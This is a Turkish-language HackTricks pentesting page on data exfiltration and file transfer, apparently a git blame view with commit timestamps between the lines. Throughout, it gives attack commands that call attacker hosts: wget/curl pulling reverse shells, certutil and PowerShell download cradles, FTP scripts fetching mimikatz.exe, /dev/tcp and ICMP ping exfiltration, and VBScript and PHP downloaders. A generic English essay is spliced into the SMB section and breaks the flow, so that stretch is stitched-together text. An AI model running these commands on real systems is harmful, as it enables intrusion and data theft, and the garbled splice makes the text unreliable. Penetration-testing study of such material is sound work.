hacktricks/generic-methodologies-and-resources/exfiltration.md

378 lines
14 KiB
Markdown
Raw Normal View History

# Veri Çıkarma
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks'ı desteklemenin diğer yolları:
2023-12-30 20:49:23 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>
## Bilgi çıkarmak için genellikle izin verilen alan adları
2022-04-28 16:01:33 +00:00
Kötüye kullanılabilen genellikle izin verilen alan adlarını bulmak için [https://lots-project.com/](https://lots-project.com/) adresini kontrol edin
## Kopyala ve Yapıştır Base64
2022-07-21 20:01:55 +00:00
**Linux**
```bash
base64 -w0 <file> #Encode file
base64 -d file #Decode file
```
2022-07-21 20:01:55 +00:00
**Windows**
```
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
```
## HTTP
2022-07-21 20:01:55 +00:00
**Linux**
```bash
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
```
2022-07-21 20:01:55 +00:00
**Windows**
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2024-02-10 18:14:16 +00:00
### Dosyaları Yükle
* [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
2024-02-10 18:14:16 +00:00
* Python modülü [uploadserver](https://pypi.org/project/uploadserver/):
```bash
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
2024-02-10 18:14:16 +00:00
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file
2024-02-10 18:14:16 +00:00
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
```
2024-02-10 18:14:16 +00:00
### **HTTPS Sunucusu**
2021-09-07 12:22:24 +00:00
```python
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
2021-09-07 13:32:20 +00:00
# https://localhost:443
2021-09-07 12:22:24 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON 2
2021-09-07 12:22:24 +00:00
import BaseHTTPServer, SimpleHTTPServer
import ssl
2021-09-07 13:32:20 +00:00
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
2021-09-07 12:22:24 +00:00
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### PYTHON3
2022-02-02 14:59:07 +00:00
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
2022-05-01 12:41:36 +00:00
###
2022-02-02 14:59:07 +00:00
2022-05-01 12:41:36 +00:00
### USING FLASK
2022-02-02 14:59:07 +00:00
from flask import Flask, redirect, request
from urllib.parse import quote
2024-02-10 18:14:16 +00:00
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
2022-05-01 12:41:36 +00:00
###
2021-09-07 12:22:24 +00:00
```
## FTP
2024-02-10 18:14:16 +00:00
### FTP sunucusu (python)
```bash
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
```
2024-02-10 18:14:16 +00:00
### FTP sunucusu (NodeJS)
```
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
```
2024-02-10 18:14:16 +00:00
### FTP sunucusu (pure-ftp)
```bash
apt-get update && apt-get install pure-ftp
```
```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
### **Windows** istemci
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
## SMB
2024-02-10 18:14:16 +00:00
Sunucu olarak Kali
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Veya bir smb paylaşımı oluşturun **samba kullanarak**:
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
2024-02-10 18:14:16 +00:00
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
```
# Exfiltration
2024-02-10 18:14:16 +00:00
## Introduction
2024-02-10 18:14:16 +00:00
Exfiltration is the unauthorized transfer of data from a target system. This can be achieved through various methods, such as using command and control (C2) channels, exfiltrating data over DNS, or leveraging legitimate services like Dropbox or Google Drive.
2024-02-10 18:14:16 +00:00
## Techniques
2024-02-10 18:14:16 +00:00
### Command and Control (C2) Channels
2024-02-10 18:14:16 +00:00
C2 channels are commonly used by attackers to exfiltrate data from compromised systems. These channels allow the attacker to maintain control over the compromised system and exfiltrate data without being detected.
2024-02-10 18:14:16 +00:00
### DNS Exfiltration
2024-02-10 18:14:16 +00:00
DNS exfiltration involves encoding data within DNS queries or responses to exfiltrate data from a target network. This technique can be used to bypass network security controls that may not inspect DNS traffic.
2024-02-10 18:14:16 +00:00
### Using Legitimate Services
Attackers may leverage legitimate services like Dropbox, Google Drive, or other cloud storage providers to exfiltrate data from a target system. By using these services, attackers can blend in with legitimate traffic and avoid detection.
## Tools and Resources
2024-02-10 18:14:16 +00:00
There are various tools and resources available to facilitate data exfiltration, including:
2024-02-10 18:14:16 +00:00
- **C2 Frameworks**: Frameworks like Metasploit, Cobalt Strike, and Empire include capabilities for data exfiltration.
- **DNS Exfiltration Tools**: Tools like Iodine, Dnscat2, and Dnsmessenger can be used for DNS exfiltration.
- **Cloud Storage Services**: Services like Dropbox, Google Drive, and OneDrive can be leveraged for exfiltrating data.
- **Custom Scripts**: Custom scripts can be developed to exfiltrate data using specific techniques tailored to the target environment.
2024-02-10 18:14:16 +00:00
## Conclusion
2024-02-10 18:14:16 +00:00
Exfiltration is a critical phase of the cyber attack lifecycle, allowing attackers to steal valuable data from target systems. By understanding exfiltration techniques and utilizing appropriate tools and resources, security professionals can better defend against data exfiltration attempts.
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
## SCP
Saldırganın SSHd çalışıyor olması gerekmektedir.
```bash
2024-02-10 18:14:16 +00:00
scp <username>@<Attacker_IP>:<directory>/<filename>
```
## SSHFS
Eğer kurbanın SSH'si varsa, saldırgan kurbanın dizinini saldırgana bağlayabilir.
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
```
## NC
NC, or Netcat, is a versatile networking tool that can be used for exfiltration. It can create connections to remote systems, listen for incoming connections, and transfer data between systems. Netcat can be used to exfiltrate data over various protocols such as TCP or UDP.
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
## /dev/tcp
### Kurbanın dosyasını indirin
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
### Kurbanın bilgisayarına dosya yükle
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt
```
2024-02-10 18:14:16 +00:00
## **ICMP**
## **ICMP**
```bash
2022-09-13 11:57:23 +00:00
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)
```
```python
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
2024-02-10 18:14:16 +00:00
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
```
## **SMTP**
Eğer bir SMTP sunucusuna veri gönderebiliyorsanız, veriyi almak için bir SMTP oluşturabilirsiniz:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
XP ve 2003'te varsayılan olarak (diğerlerinde kurulum sırasında açıkça eklenmesi gerekir)
2024-02-10 18:14:16 +00:00
Kali'de **TFTP sunucusunu başlatın**:
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
**Python'da TFTP sunucusu:**
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
```
2024-02-10 18:14:16 +00:00
**Kurban** üzerinde, Kali sunucusuna bağlanın:
```bash
tftp -i <KALI-IP> get nc.exe
```
## PHP
PHP'de bir satırlık kod ile bir dosya indirin:
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
## VBScript
### VBScript Exfiltration
2024-02-10 18:14:16 +00:00
VBScript can be used to exfiltrate data from a compromised system. This can be achieved by writing the data to a file and then sending it to an external server using various methods such as HTTP POST requests or SMTP email. VBScript can also be used to compress the data before exfiltration to minimize the size of the transferred data.
```bash
Attacker> python -m SimpleHTTPServer 80
```
**Kurban**
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
`debug.exe` programı sadece ikili dosyaların incelenmesine izin vermekle kalmaz, aynı zamanda onları onaltılıktan yeniden oluşturma yeteneğine sahiptir. Bu, bir ikili dosyanın onaltılık bir temsilini sağlayarak `debug.exe`nin ikili dosyayı oluşturabilmesi anlamına gelir. Bununla birlikte, debug.exe'nin **64 kb boyutundaki dosyaları birleştirme sınırlaması olduğunu** unutmamak önemlidir.
2024-02-07 04:06:18 +00:00
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
```html
Sonra metni windows-shell'e kopyalayıp nc.exe adında bir dosya oluşturulacak.
2024-02-07 04:06:18 +00:00
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
## DNS
2021-04-01 12:07:45 +00:00
2022-06-28 10:36:33 +00:00
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları:
2023-12-30 20:49:23 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na bakın(https://github.com/sponsors/carlospolop)!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>
```